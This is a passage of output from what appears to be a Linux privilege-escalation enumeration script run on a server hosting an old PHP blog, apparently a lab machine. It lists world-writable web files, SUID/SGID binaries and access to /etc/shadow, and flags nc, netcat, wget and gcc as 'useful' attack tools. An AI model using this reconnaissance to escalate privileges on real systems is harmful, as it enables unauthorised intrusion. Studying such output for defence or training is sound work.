-rw-rw-rw-  1 root root  29K Jan 18  2005 strings.php

/var/www/blog/languages/dutch:
total 44K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 19 root root 4.0K Jan 18  2005 ..
-rw-rw-rw-  1 root root    5 May 16  2004 id.txt
-rw-rw-rw-  1 root root  30K Jan 18  2005 strings.php

/var/www/blog/languages/dutch nieuw:
total 44K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 19 root root 4.0K Jan 18  2005 ..
-rwxrwxrwx  1 root root   16 Jul 28  2004 id.txt
-rwxrwxrwx  1 root root  30K Jan 18  2005 strings.php

/var/www/blog/languages/english:
total 44K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 19 root root 4.0K Jan 18  2005 ..
-rwxrwxrwx  1 root root    7 Sep 20  2004 id.txt
-rwxrwxrwx  1 root root  29K Jan 18  2005 strings.php

/var/www/blog/languages/french:
total 44K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 19 root root 4.0K Jan 18  2005 ..
-rw-rw-rw-  1 root root    8 Jun  1  2004 id.txt
-rwxrwxrwx  1 root root  31K Jan 18  2005 strings.php

/var/www/blog/languages/german01:
total 44K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 19 root root 4.0K Jan 18  2005 ..
-rwxrwxrwx  1 root root   36 Jan  2  2005 id.txt
-rwxrwxrwx  1 root root  31K Jan 18  2005 strings.php

/var/www/blog/languages/italiano:
total 44K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 19 root root 4.0K Jan 18  2005 ..
-rw-rw-rw-  1 root root    8 Jun 23  2004 id.txt
-rw-rw-rw-  1 root root  31K Jan 18  2005 strings.php

/var/www/blog/languages/japanese:
total 40K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 19 root root 4.0K Jan 18  2005 ..
-rw-rw-rw-  1 root root    8 Nov 18  2004 id.txt
-rw-rw-rw-  1 root root  26K Jan 18  2005 strings.php

/var/www/blog/languages/malay:
total 44K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 19 root root 4.0K Jan 18  2005 ..
-rw-rw-rw-  1 root root    5 Jun  7  2004 id.txt
-rw-rw-rw-  1 root root  30K Jan 18  2005 strings.php

/var/www/blog/languages/portuguese:
total 44K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 19 root root 4.0K Jan 18  2005 ..
-rw-rw-rw-  1 root root    9 Jun  9  2004 id.txt
-rw-rw-rw-  1 root root  30K Jan 18  2005 strings.php

/var/www/blog/languages/russian_koi8-ru:
total 44K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 19 root root 4.0K Jan 18  2005 ..
-rw-rw-rw-  1 root root   35 May 13  2004 id.txt
-rw-rw-rw-  1 root root  30K Jan 18  2005 strings.php

/var/www/blog/languages/russian_windows-1251:
total 44K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 19 root root 4.0K Jan 18  2005 ..
-rw-rw-rw-  1 root root   32 May 13  2004 id.txt
-rw-rw-rw-  1 root root  30K Jan 18  2005 strings.php

/var/www/blog/languages/spanish:
total 44K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 19 root root 4.0K Jan 18  2005 ..
-rwxrwxrwx  1 root root    7 Nov  4  2004 id.txt
-rw-rw-rw-  1 root root  31K Jan 18  2005 strings.php

/var/www/blog/languages/tamil:
total 60K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 19 root root 4.0K Jan 18  2005 ..
-rw-rw-rw-  1 root root   31 Jun 18  2004 id.txt
-rw-rw-rw-  1 root root  46K Jan 18  2005 strings.php

/var/www/blog/languages/turkish:
total 44K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 19 root root 4.0K Jan 18  2005 ..
-rwxrwxrwx  1 root root    6 Jul  9  2004 id.txt
-rwxrwxrwx  1 root root  30K Jan 18  2005 strings.php

/var/www/blog/languages/zh_chinese:
total 44K
drwxrwxrwx  2 root root 4.0K Jan  4  2005 .
drwxrwxrwx 19 root root 4.0K Jan 18  2005 ..
-rwxrwxrwx  1 root root   35 Jul 12  2004 id.txt
-rwxrwxrwx  1 root root  31K Jan 18  2005 strings.php

/var/www/blog/scripts:
total 264K
drwxrwxrwx  2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 11 root root 4.0K May  9  2011 ..
-rwxrwxrwx  1 root root 1.6K Jan  1  2005 sb_categories.php
-rwxrwxrwx  1 root root 3.7K Sep 20  2004 sb_color.php
-rwxrwxrwx  1 root root  11K Jan 18  2005 sb_comments.php
-rwxrwxrwx  1 root root 4.7K Jan  5  2005 sb_communicate.php
-rwxrwxrwx  1 root root 9.7K Nov 30  2004 sb_config.php
-rwxrwxrwx  1 root root  18K Nov 29  2004 sb_date.php
-rwxrwxrwx  1 root root  23K Jan 18  2005 sb_display.php
-rwxrwxrwx  1 root root 4.9K Dec 11  2004 sb_editor.php
-rwxrwxrwx  1 root root 8.8K Dec 28  2004 sb_entry.php
-rwxrwxrwx  1 root root  13K Jan  1  2005 sb_feed.php
-rwxrwxrwx  1 root root 4.8K Oct 16  2004 sb_fileio.php
-rwxrwxrwx  1 root root  19K Nov 29  2004 sb_formatting.php
-rwxrwxrwx  1 root root 2.1K Jan 18  2005 sb_functions.php
-rwxrwxrwx  1 root root 2.5K Sep 20  2004 sb_image.php
-rwxrwxrwx  1 root root  811 Sep 20  2004 sb_javascript.js
-rwxrwxrwx  1 root root  888 Sep 20  2004 sb_log.php
-rwxrwxrwx  1 root root 4.0K Jan 18  2005 sb_login.php
-rwxrwxrwx  1 root root  23K Jan 17  2005 sb_menu.php
-rw-rw-rw-  1 root root 5.6K Jan  2  2005 sb_search.php
-rwxrwxrwx  1 root root 6.7K Oct 18  2004 sb_static.php
-rwxrwxrwx  1 root root  345 Sep 20  2004 sb_template.php
-rwxrwxrwx  1 root root 9.0K Jan 18  2005 sb_theme.php
-rw-rw-rw-  1 root root  12K Jan  5  2005 sb_trackback.php
-rwxrwxrwx  1 root root  18K Jan 18  2005 sb_utility.php

/var/www/blog/themes:
total 128K
drwxrwxrwx  4 root root 4.0K Jan 18  2005 .
drwxrwxrwx 11 root root 4.0K May  9  2011 ..
drwxrwxrwx  4 root root 4.0K Jan 18  2005 default
drwxrwxrwx  4 root root 4.0K Jan 18  2005 modern
-rwxr-xr-x  1 root root 109K Jan 18  2005 new.tgz

/var/www/blog/themes/default:
total 48K
drwxrwxrwx 4 root root 4.0K Jan 18  2005 .
drwxrwxrwx 4 root root 4.0K Jan 18  2005 ..
drwxrwxrwx 2 root root 4.0K Jan 18  2005 colors
-rwxrwxrwx 1 root root    7 Sep 21  2004 id.txt
drwxrwxrwx 3 root root 4.0K Jan 18  2005 images
-rwxrwxrwx 1 root root 2.6K Jan 18  2005 style.css
-rwxrwxrwx 1 root root  19K Jan 18  2005 themes.php
-rwxrwxrwx 1 root root 1013 Sep 21  2004 user_style.php

/var/www/blog/themes/default/colors:
total 28K
drwxrwxrwx 2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 4 root root 4.0K Jan 18  2005 ..
-rw-rw-rw- 1 root root  353 Jan  2  2005 darkgrey.txt
-rwxrwxrwx 1 root root  351 Jan 17  2005 default.txt
-rw-r--r-- 1 root root  349 Jan  7  2005 ghost.txt
-rw-r--r-- 1 root root  351 Jan 17  2005 neutral.txt
-rwxrwxrwx 1 root root  353 Jan 17  2005 warmgrey.txt

/var/www/blog/themes/default/images:
total 12K
drwxrwxrwx 3 root root 4.0K Jan 18  2005 .
drwxrwxrwx 4 root root 4.0K Jan 18  2005 ..
drwxrwxrwx 2 root root 4.0K Jan 18  2005 stars

/var/www/blog/themes/default/images/stars:
total 20K
drwxrwxrwx 2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 3 root root 4.0K Jan 18  2005 ..
-rwxrwxrwx 1 root root  227 Sep 21  2004 full_star.png
-rwxrwxrwx 1 root root  254 Sep 21  2004 half_star.png
-rwxrwxrwx 1 root root  230 Sep 21  2004 no_star.png

/var/www/blog/themes/modern:
total 56K
drwxrwxrwx 4 root root 4.0K Jan 18  2005 .
drwxrwxrwx 4 root root 4.0K Jan 18  2005 ..
drwxrwxrwx 2 root root 4.0K Jan 18  2005 colors
-rwxrwxrwx 1 root root    6 Nov  4  2004 id.txt
drwxrwxrwx 3 root root 4.0K Nov  8  2004 images
-rwxrwxrwx 1 root root 3.4K Nov 29  2004 style.css
-rwxrwxrwx 1 root root  26K Jan 18  2005 themes.php
-rwxrwxrwx 1 root root 2.2K Nov  4  2004 user_style.php

/var/www/blog/themes/modern/colors:
total 28K
drwxrwxrwx 2 root root 4.0K Jan 18  2005 .
drwxrwxrwx 4 root root 4.0K Jan 18  2005 ..
-rwxrwxrwx 1 root root  626 Jan 17  2005 classic.txt
-rw-rw-rw- 1 root root  628 Jan  2  2005 darkgrey.txt
-rw-r--r-- 1 root root  624 Jan  7  2005 ghost.txt
-rw-rw-rw- 1 root root  626 Jan  2  2005 neutral.txt
-rwxrwxrwx 1 root root  628 Jan 17  2005 warmgrey.txt

/var/www/blog/themes/modern/images:
total 40K
drwxrwxrwx 3 root root 4.0K Nov  8  2004 .
drwxrwxrwx 4 root root 4.0K Jan 18  2005 ..
-rwxrwxrwx 1 root root  669 Nov  4  2004 box_add.png
-rwxrwxrwx 1 root root  602 Nov  4  2004 box_cancel.png
-rwxrwxrwx 1 root root  704 Nov  4  2004 box_delete.png
-rwxrwxrwx 1 root root  751 Nov  4  2004 box_down.png
-rwxrwxrwx 1 root root  720 Nov  4  2004 box_left.png
-rwxrwxrwx 1 root root  708 Nov  4  2004 box_right.png
-rwxrwxrwx 1 root root  711 Nov  4  2004 box_up.png
drwxrwxrwx 2 root root 4.0K Nov  8  2004 stars

/var/www/blog/themes/modern/images/stars:
total 20K
drwxrwxrwx 2 root root 4.0K Nov  8  2004 .
drwxrwxrwx 3 root root 4.0K Nov  8  2004 ..
-rwxrwxrwx 1 root root  227 Nov  4  2004 full_star.png
-rwxrwxrwx 1 root root  254 Nov  4  2004 half_star.png
-rwxrwxrwx 1 root root  230 Nov  4  2004 no_star.png

/var/www/includes:
total 24K
drwxr-xr-x 2 root root 4.0K May  7  2011 .
drwxr-xr-x 4 root root 4.0K May  9  2011 ..
-rw-r--r-- 1 root root 2.0K May  7  2011 config.inc.php
-rw-r--r-- 1 root root  863 May  7  2011 footer.html
-rw-r--r-- 1 root root  746 May  7  2011 header.html
-rw-r--r-- 1 root root 2.3K Mar 24  2008 layout.css


### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc


[-] Installed compilers:
ii  g++                             4:4.5.2-1ubuntu3                   The GNU C++ compiler
ii  g++-4.5                         4.5.2-8ubuntu4                     The GNU C++ compiler
ii  gcc                             4:4.5.2-1ubuntu3                   The GNU C compiler
ii  gcc-4.5                         4.5.2-8ubuntu4                     The GNU C compiler


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 999 May  9  2011 /etc/passwd
-rw-r--r-- 1 root root 667 May  7  2011 /etc/group
-rw-r--r-- 1 root root 497 May  7  2011 /etc/profile
-rw-r----- 1 root shadow 835 May  7  2011 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 240824 Apr  2  2011 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10592 Apr 11  2011 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 10408 Dec 20  2010 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 37096 Feb 20  2011 /usr/bin/chsh
-rwsr-xr-x 2 root root 168800 Apr 15  2011 /usr/bin/sudo
-rwsr-xr-x 1 root root 32352 Feb 20  2011 /usr/bin/newgrp
-rwsr-xr-x 1 root root 42824 Feb 20  2011 /usr/bin/passwd
-rwsr-sr-x 1 daemon daemon 52032 Jun 27  2010 /usr/bin/at
-rwsr-xr-x 1 root root 63848 Feb 20  2011 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 62352 Oct 15  2010 /usr/bin/mtr
-rwsr-xr-x 1 root root 18896 Nov 15  2010 /usr/bin/traceroute6.iputils
-rwsr-xr-x 2 root root 168800 Apr 15  2011 /usr/bin/sudoedit
-rwsr-xr-x 1 root root 41832 Feb 20  2011 /usr/bin/chfn
-rwsr-sr-x 1 libuuid libuuid 18832 Mar 21  2011 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 325744 Feb  4  2011 /usr/sbin/pppd
-rwsr-xr-x 1 root root 82224 Mar 21  2011 /bin/mount
-rwsr-xr-x 1 root root 56616 Mar 21  2011 /bin/umount
-rwsr-xr-x 1 root root 35680 Nov 15  2010 /bin/ping
-rwsr-xr-x 1 root root 40248 Nov 15  2010 /bin/ping6
-rwsr-xr-x 1 root root 31320 Feb 10  2011 /bin/fusermount
-rwsr-xr-x 1 root root 36832 Feb 20  2011 /bin/su


[-] SGID files:
-rwxr-sr-x 1 root tty 14648 Feb  1  2011 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 35896 Jan  5  2011 /usr/bin/crontab
-rwxr-sr-x 1 root mail 14744 May 18  2010 /usr/bin/dotlockfile
-rwxr-sr-x 1 root utmp 376080 Apr 14  2011 /usr/bin/screen
-rwxr-sr-x 1 root shadow 50760 Feb 20  2011 /usr/bin/chage
-rwsr-sr-x 1 daemon daemon 52032 Jun 27  2010 /usr/bin/at
-rwxr-sr-x 1 root ssh 125008 Apr  2  2011 /usr/bin/ssh-agent
-rwxr-sr-x 3 root mail 14608 Jun 22  2010 /usr/bin/mail-lock
-rwxr-sr-x 1 root mlocate 39464 Oct 14  2010 /usr/bin/mlocate
-rwxr-sr-x 3 root mail 14608 Jun 22  2010 /usr/bin/mail-unlock
-rwxr-sr-x 1 root tty 14760 Mar 21  2011 /usr/bin/wall
-rwxr-sr-x 3 root mail 14608 Jun 22  2010 /usr/bin/mail-touchlock
-rwxr-sr-x 1 root shadow 23168 Feb 20  2011 /usr/bin/expiry
-rwsr-sr-x 1 libuuid libuuid 18832 Mar 21  2011 /usr/sbin/uuidd
-rwxr-sr-x 1 root shadow 35432 Apr 14  2011 /sbin/unix_chkpwd


[-] World-writable files (excluding /proc and /sys):
-rwxrwxrwx 1 root root 1975 Sep 20  2004 /var/www/blog/login.php
-rwxrwxrwx 1 root root 6 Nov  4  2004 /var/www/blog/themes/modern/id.txt
-rwxrwxrwx 1 root root 25953 Jan 18  2005 /var/www/blog/themes/modern/themes.php
-rwxrwxrwx 1 root root 2164 Nov  4  2004 /var/www/blog/themes/modern/user_style.php
-rwxrwxrwx 1 root root 628 Jan 17  2005 /var/www/blog/themes/modern/colors/warmgrey.txt
-rwxrwxrwx 1 root root 626 Jan 17  2005 /var/www/blog/themes/modern/colors/classic.txt
-rw-rw-rw- 1 root root 628 Jan  2  2005 /var/www/blog/themes/modern/colors/darkgrey.txt
-rw-rw-rw- 1 root root 626 Jan  2  2005 /var/www/blog/themes/modern/colors/neutral.txt
-rwxrwxrwx 1 root root 3423 Nov 29  2004 /var/www/blog/themes/modern/style.css
-rwxrwxrwx 1 root root 751 Nov  4  2004 /var/www/blog/themes/modern/images/box_down.png
-rwxrwxrwx 1 root root 230 Nov  4  2004 /var/www/blog/themes/modern/images/stars/no_star.png
-rwxrwxrwx 1 root root 254 Nov  4  2004 /var/www/blog/themes/modern/images/stars/half_star.png
-rwxrwxrwx 1 root root 227 Nov  4  2004 /var/www/blog/themes/modern/images/stars/full_star.png
-rwxrwxrwx 1 root root 720 Nov  4  2004 /var/www/blog/themes/modern/images/box_left.png
-rwxrwxrwx 1 root root 708 Nov  4  2004 /var/www/blog/themes/modern/images/box_right.png
-rwxrwxrwx 1 root root 711 Nov  4  2004 /var/www/blog/themes/modern/images/box_up.png
-rwxrwxrwx 1 root root 669 Nov  4  2004 /var/www/blog/themes/modern/images/box_add.png
-rwxrwxrwx 1 root root 602 Nov  4  2004 /var/www/blog/themes/modern/images/box_cancel.png
-rwxrwxrwx 1 root root 704 Nov  4  2004 /var/www/blog/themes/modern/images/box_delete.png
-rwxrwxrwx 1 root root 7 Sep 21  2004 /var/www/blog/themes/default/id.txt
-rwxrwxrwx 1 root root 18916 Jan 18  2005 /var/www/blog/themes/default/themes.php
-rwxrwxrwx 1 root root 1013 Sep 21  2004 /var/www/blog/themes/default/user_style.php
-rwxrwxrwx 1 root root 353 Jan 17  2005 /var/www/blog/themes/default/colors/warmgrey.txt
-rw-rw-rw- 1 root root 353 Jan  2  2005 /var/www/blog/themes/default/colors/darkgrey.txt
-rwxrwxrwx 1 root root 351 Jan 17  2005 /var/www/blog/themes/default/colors/default.txt
-rwxrwxrwx 1 root root 2600 Jan 18  2005 /var/www/blog/themes/default/style.css
-rwxrwxrwx 1 root root 230 Sep 21  2004 /var/www/blog/themes/default/images/stars/no_star.png
-rwxrwxrwx 1 root root 254 Sep 21  2004 /var/www/blog/themes/default/images/stars/half_star.png
-rwxrwxrwx 1 root root 227 Sep 21  2004 /var/www/blog/themes/default/images/stars/full_star.png
-rwxrwxrwx 1 root root 2107 Jan 18  2005 /var/www/blog/scripts/sb_functions.php
-rwxrwxrwx 1 root root 811 Sep 20  2004 /var/www/blog/scripts/sb_javascript.js
-rwxrwxrwx 1 root root 10371 Jan 18  2005 /var/www/blog/scripts/sb_comments.php
-rwxrwxrwx 1 root root 4844 Oct 16  2004 /var/www/blog/scripts/sb_fileio.php
-rwxrwxrwx 1 root root 888 Sep 20  2004 /var/www/blog/scripts/sb_log.php
-rwxrwxrwx 1 root root 3705 Sep 20  2004 /var/www/blog/scripts/sb_color.php
-rwxrwxrwx 1 root root 17682 Jan 18  2005 /var/www/blog/scripts/sb_utility.php
-rwxrwxrwx 1 root root 2514 Sep 20  2004 /var/www/blog/scripts/sb_image.php
-rwxrwxrwx 1 root root 4037 Jan 18  2005 /var/www/blog/scripts/sb_login.php
-rwxrwxrwx 1 root root 345 Sep 20  2004 /var/www/blog/scripts/sb_template.php
-rwxrwxrwx 1 root root 4753 Jan  5  2005 /var/www/blog/scripts/sb_communicate.php
-rwxrwxrwx 1 root root 18357 Nov 29  2004 /var/www/blog/scripts/sb_date.php
-rwxrwxrwx 1 root root 13058 Jan  1  2005 /var/www/blog/scripts/sb_feed.php
-rwxrwxrwx 1 root root 6825 Oct 18  2004 /var/www/blog/scripts/sb_static.php
-rw-rw-rw- 1 root root 5646 Jan  2  2005 /var/www/blog/scripts/sb_search.php
-rwxrwxrwx 1 root root 4976 Dec 11  2004 /var/www/blog/scripts/sb_editor.php
-rwxrwxrwx 1 root root 23316 Jan 17  2005 /var/www/blog/scripts/sb_menu.php
-rw-rw-rw- 1 root root 11312 Jan  5  2005 /var/www/blog/scripts/sb_trackback.php
-rwxrwxrwx 1 root root 8943 Dec 28  2004 /var/www/blog/scripts/sb_entry.php
-rwxrwxrwx 1 root root 9902 Nov 30  2004 /var/www/blog/scripts/sb_config.php
-rwxrwxrwx 1 root root 22775 Jan 18  2005 /var/www/blog/scripts/sb_display.php
-rwxrwxrwx 1 root root 18527 Nov 29  2004 /var/www/blog/scripts/sb_formatting.php
-rwxrwxrwx 1 root root 1547 Jan  1  2005 /var/www/blog/scripts/sb_categories.php
-rwxrwxrwx 1 root root 9162 Jan 18  2005 /var/www/blog/scripts/sb_theme.php
-rwxrwxrwx 1 root root 4754 Jan 18  2005 /var/www/blog/index.php
-rwxrwxrwx 1 root root 1201 Sep 20  2004 /var/www/blog/image_list.php
-rw-rw-rw- 1 root root 1745 Nov 24  2004 /var/www/blog/trackback_delete_cgi.php
-rw-rw-rw- 1 root root 4496 Jan  2  2005 /var/www/blog/add_static.php
-rwxrwxrwx 1 root root 400 Nov  8  2004 /var/www/blog/rss.php
-rwxrwxrwx 1 root root 1929 Oct 18  2004 /var/www/blog/upload_img_cgi.php
-rwxrwxrwx 1 root root 3383 Oct 18  2004 /var/www/blog/themes.php
-rwxrwxrwx 1 root root 1560 Jan 18  2005 /var/www/blog/contact_cgi.php
-rwxrwxrwx 1 root root 908 Sep 20  2004 /var/www/blog/recompress.php
-rw-rw-rw- 1 root root 6 May 13  2004 /var/www/blog/languages/danish/id.txt
-rw-rw-rw- 1 root root 29289 Jan 18  2005 /var/www/blog/languages/danish/strings.php
-rw-rw-rw- 1 root root 8 Nov 18  2004 /var/www/blog/languages/japanese/id.txt
-rw-rw-rw- 1 root root 26623 Jan 18  2005 /var/www/blog/languages/japanese/strings.php
-rw-rw-rw- 1 root root 31 Jun 18  2004 /var/www/blog/languages/tamil/id.txt
-rw-rw-rw- 1 root root 46963 Jan 18  2005 /var/www/blog/languages/tamil/strings.php
-rw-rw-rw- 1 root root 8 Jun 23  2004 /var/www/blog/languages/italiano/id.txt
-rw-rw-rw- 1 root root 31590 Jan 18  2005 /var/www/blog/languages/italiano/strings.php
-rw-rw-rw- 1 root root 32 May 13  2004 /var/www/blog/languages/russian_windows-1251/id.txt
-rw-rw-rw- 1 root root 30245 Jan 18  2005 /var/www/blog/languages/russian_windows-1251/strings.php
-rwxrwxrwx 1 root root 16 Jul 28  2004 /var/www/blog/languages/dutch nieuw/id.txt
-rwxrwxrwx 1 root root 30256 Jan 18  2005 /var/www/blog/languages/dutch nieuw/strings.php
-rw-rw-rw- 1 root root 8 Jun  1  2004 /var/www/blog/languages/french/id.txt
-rwxrwxrwx 1 root root 31162 Jan 18  2005 /var/www/blog/languages/french/strings.php
-rwxrwxrwx 1 root root 35 Jul 12  2004 /var/www/blog/languages/zh_chinese/id.txt
-rwxrwxrwx 1 root root 31334 Jan 18  2005 /var/www/blog/languages/zh_chinese/strings.php
-rwxrwxrwx 1 root root 7 Nov  4  2004 /var/www/blog/languages/spanish/id.txt
-rw-rw-rw- 1 root root 31362 Jan 18  2005 /var/www/blog/languages/spanish/strings.php
-rw-rw-rw- 1 root root 35 May 13  2004 /var/www/blog/languages/russian_koi8-ru/id.txt
-rw-rw-rw- 1 root root 30279 Jan 18  2005 /var/www/blog/languages/russian_koi8-ru/strings.php
-rw-rw-rw- 1 root root 5 May 16  2004 /var/www/blog/languages/dutch/id.txt
-rw-rw-rw- 1 root root 30400 Jan 18  2005 /var/www/blog/languages/dutch/strings.php
-rw-rw-rw- 1 root root 5 Jun  7  2004 /var/www/blog/languages/malay/id.txt
-rw-rw-rw- 1 root root 30253 Jan 18  2005 /var/www/blog/languages/malay/strings.php
-rw-rw-rw- 1 root root 9 Jun  9  2004 /var/www/blog/languages/portuguese/id.txt
-rw-rw-rw- 1 root root 29889 Jan 18  2005 /var/www/blog/languages/portuguese/strings.php
-rwxrwxrwx 1 root root 36 Jan  2  2005 /var/www/blog/languages/german01/id.txt
-rwxrwxrwx 1 root root 31114 Jan 18  2005 /var/www/blog/languages/german01/strings.php
-rwxrwxrwx 1 root root 6 Jul  9  2004 /var/www/blog/languages/turkish/id.txt
-rwxrwxrwx 1 root root 30085 Jan 18  2005 /var/www/blog/languages/turkish/strings.php
-rw-rw-rw- 1 root root 7 Jun  1  2004 /var/www/blog/languages/chinese/id.txt
-rw-rw-rw- 1 root root 26722 Jan 18  2005 /var/www/blog/languages/chinese/strings.php
-rwxrwxrwx 1 root root 7 Sep 20  2004 /var/www/blog/languages/english/id.txt
-rwxrwxrwx 1 root root 29207 Jan 18  2005 /var/www/blog/languages/english/strings.php
-rwxrwxrwx 1 root root 5781 Jan 18  2005 /var/www/blog/add_link.php
-rwxrwxrwx 1 root root 2886 Nov 29  2004 /var/www/blog/setup_cgi.php
-rwxrwxrwx 1 root root 12027 Nov 29  2004 /var/www/blog/setup.php
-rwxrwxrwx 1 root root 1616 Oct 18  2004 /var/www/blog/static.php
-rwxrwxrwx 1 root root 2374 Nov 22  2004 /var/www/blog/contact.php
-rwxrwxrwx 1 root root 1764 Jan 18  2005 /var/www/blog/docs/CREDITS.TXT
-rwxrwxrwx 1 root root 875 Jan 18  2005 /var/www/blog/docs/README.TXT
-rwxrwxrwx 1 root root 813 Jan 18  2005 /var/www/blog/docs/UPGRADING.TXT
-rwxrwxrwx 1 root root 1469 Sep 20  2004 /var/www/blog/docs/INSTALL.TXT
-rwxrw-rw- 1 root root 877 Nov 28  2004 /var/www/blog/docs/TRACKBACKS.TXT
-rwxrwxrwx 1 root root 4733 Jan 18  2005 /var/www/blog/docs/TODO.TXT
-rwxrwxrwx 1 root root 4206 Jan 18  2005 /var/www/blog/docs/CHANGELOG.TXT
-rwxrwxrwx 1 root root 281 Sep 22  2004 /var/www/blog/interface/button_rdf10.png
-rwxrwxrwx 1 root root 289 Sep 22  2004 /var/www/blog/interface/button_rss20.png
-rwxrwxrwx 1 root root 275 Sep 22  2004 /var/www/blog/interface/button_atom03.png
-rwxrwxrwx 1 root root 702 Aug 23  2004 /var/www/blog/interface/button_sphpblog.png
-rwxrwxrwx 1 root root 280 Aug 23  2004 /var/www/blog/interface/button_php.png
-rwxrwxrwx 1 root root 2645 Sep 15  2004 /var/www/blog/interface/feed.png
-rwxrwxrwx 1 root root 2645 Aug 23  2004 /var/www/blog/interface/simple_php_blog.png
-rwxrwxrwx 1 root root 43 Sep 20  2004 /var/www/blog/interface/filebrowser/spacer.gif
-rwxrwxrwx 1 root root 88 Sep 20  2004 /var/www/blog/interface/filebrowser/folder_icon.gif
-rwxrwxrwx 1 root root 145 Sep 20  2004 /var/www/blog/interface/filebrowser/file_icon.gif
-rwxrwxrwx 1 root root 365 Aug 23  2004 /var/www/blog/interface/button_txt.png
-rwxrwxrwx 1 root root 1078 Sep 15  2004 /var/www/blog/interface/favicon.ico
-rwxrwxrwx 1 root root 3285 Oct 18  2004 /var/www/blog/delete_static.php
-rwxrwxrwx 1 root root 2720 Jan  4  2005 /var/www/blog/comment_add_cgi.php
-rwxrwxrwx 1 root root 10194 Jan  4  2005 /var/www/blog/comments.php
-rwxrwxrwx 1 root root 4185 Oct 18  2004 /var/www/blog/info.php
-rwxrw-rw- 1 root root 922 Jan 18  2005 /var/www/blog/upgrade.php
-rwxrw-rw- 1 root root 7956 Nov 27  2004 /var/www/blog/trackback.php
-rwxrwxrwx 1 root root 2519 Nov 30  2004 /var/www/blog/colors_cgi.php
-rwxrwxrwx 1 root root 1059 Sep 20  2004 /var/www/blog/logout.php
-rwxrwxrwx 1 root root 2025 Sep 20  2004 /var/www/blog/set_login.php
-rwxrwxrwx 1 root root 7516 Nov 30  2004 /var/www/blog/colors.php
-rwxrwxrwx 1 root root 1348 Sep 20  2004 /var/www/blog/search.php
-rwxrwxrwx 1 root root 2282 Sep 20  2004 /var/www/blog/install00.php
-rwxrwxrwx 1 root root 5984 Dec 27  2004 /var/www/blog/preview_static_cgi.php
-rwxrwxrwx 1 root root 9972 Sep 28  2004 /var/www/blog/upload_img_new.php
-rwxrwxrwx 1 root root 5952 Dec 28  2004 /var/www/blog/add.php
-rwxrw-rw- 1 root root 1001 Nov 28  2004 /var/www/blog/downgrade.php
-rwxrwxrwx 1 root root 10835 Jan  6  2005 /var/www/blog/categories.php
-rw-rw-rw- 1 root root 6904 Jan 18  2005 /var/www/blog/stats.php
-rwxrwxrwx 1 root root 1345 Sep 20  2004 /var/www/blog/set_login_cgi.php
-rwxrwxrwx 1 root root 400 Nov  8  2004 /var/www/blog/rdf.php
-rwxrwxrwx 1 root root 1675 Oct 18  2004 /var/www/blog/add_static_cgi.php
-rwxrwxrwx 1 root root 7789 Dec 28  2004 /var/www/blog/preview_cgi.php
-rwxrwxrwx 1 root root 1685 Jan 18  2005 /var/www/blog/login_cgi.php
-rwxrwxrwx 1 root root 403 Nov  8  2004 /var/www/blog/atom.php
-rw-rw-rw- 1 root root 1489 Jun 17  2004 /var/www/blog/upload_img.php
-rwxrwxrwx 1 root root 2650 Sep 20  2004 /var/www/blog/install02.php
-rwxrwxrwx 1 root root 3039 Oct 18  2004 /var/www/blog/delete.php
-rwxrwxrwx 1 root root 2239 Sep 20  2004 /var/www/blog/install03.php
-rwxrwxrwx 1 root root 2307 Jan  2  2005 /var/www/blog/rate_cgi.php
-rwxrwxrwx 1 root root 6183 Dec 27  2004 /var/www/blog/add_block.php
-rwxrwxrwx 1 root root 1530 Sep 20  2004 /var/www/blog/install01.php
-rwxrw-rw- 1 root root 2780 Jan  1  2005 /var/www/blog/languages.php
-rwxrw-rw- 1 root root 5294 Jan  1  2005 /var/www/blog/languages_cgi.php
-rwxrwxrwx 1 root root 4609 Dec 28  2004 /var/www/blog/add_cgi.php
-rwxrwxrwx 1 root root 1778 Oct 18  2004 /var/www/blog/comment_delete_cgi.php
-rwxrwxrwx 1 root root 2358 Oct 18  2004 /var/www/blog/options_cgi.php
-rw-rw-rw- 1 root root 145408 Nov 30  2004 /var/www/blog/flash/color_picker.fla
-rw-rw-rw- 1 root root 11832 Nov 30  2004 /var/www/blog/flash/color_picker.swf
-rwxrwxrwx 1 root root 22803 Nov 29  2004 /var/www/blog/options.php
-rwxrwxrwx 1 root root 1558 Sep 20  2004 /var/www/blog/install03_cgi.php


[-] NFS displaying partitions and filesystems - you need to check if exotic filesystems
# /etc/fstab: static file system information.
#
# Use 'blkid -o value -s UUID' to print the universally unique identifier
# for a device; this may be used with UUID= as a more robust way to name
# devices that works even if disks are added and removed. See fstab(5).
#
# <file system> <mount point>   <type>  <options>       <dump>  <pass>
proc            /proc           proc    nodev,noexec,nosuid 0       0
/dev/mapper/web-root /               ext4    errors=remount-ro 0       1
# /boot was on /dev/sda1 during installation
UUID=d1f3c539-c07b-4bd8-a5c5-d05909b90366 /boot           ext2    defaults        0       2
